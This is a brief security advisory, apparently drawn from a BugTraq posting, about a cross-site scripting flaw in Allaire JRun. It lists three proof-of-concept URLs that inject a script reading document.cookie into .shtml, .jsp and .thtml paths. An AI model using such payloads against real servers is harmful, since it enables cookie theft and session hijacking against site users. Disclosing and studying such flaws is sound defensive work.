Allaire JRun Cross-Site Scripting Vulnerability

Allaire JRun Cross-Site Scripting Vulnerability

TAKAGI, Hiromitsu provided the following example in his BugTraq posting:

http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.shtml
http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.jsp
http://JRun/<SCRIPT>alert(document.cookie)</SCRIPT>.thtml